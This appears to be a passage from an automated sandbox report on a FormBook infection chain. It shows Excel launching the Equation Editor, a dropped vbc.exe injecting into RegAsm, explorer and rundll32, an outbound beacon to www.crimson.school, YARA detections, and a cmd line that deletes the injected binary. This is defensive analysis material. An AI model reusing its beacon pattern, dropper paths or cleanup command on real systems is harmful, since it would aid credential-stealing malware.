X-Cache: MISS from lin-10-170-0-22.gridhost.co.uk
X-Cache-Lookup: MISS from lin-10-170-0-22.gridhost.co.uk:3128
Connection: close
Set-Cookie: DYNSRV=lin-10-170-0-22; path=/


Session ID: 7
Source IP: 192.168.2.22
Source Port: 49172
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Nov 20, 2020 12:06:53.091903925 CET
kBytes transferred: 590
Direction: OUT
Data:
GET /o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg== HTTP/1.1
Host: www.crimson.school
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Nov 20, 2020 12:06:53.215748072 CET
kBytes transferred: 591
Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Fri, 20 Nov 2020 11:06:53 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb6e151-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 12:04:39
Start date: 20/11/2020
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f330000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:04:58
Start date: 20/11/2020
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:05:00
Start date: 20/11/2020
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0xb80000
File size: 552960 bytes
MD5 hash: BF75ED61E1B1F7B310EC1D999077C4DD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 27%, ReversingLabs
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:03
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                Imagebase:0x1080000
                                                                                                                                                                File size:64672 bytes
                                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:05
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:
                                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                                File size:3229696 bytes
                                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:16
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                File size:44544 bytes
                                                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:20
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                                                                                                                Imagebase:0x4aaf0000
                                                                                                                                                                File size:302592 bytes
                                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >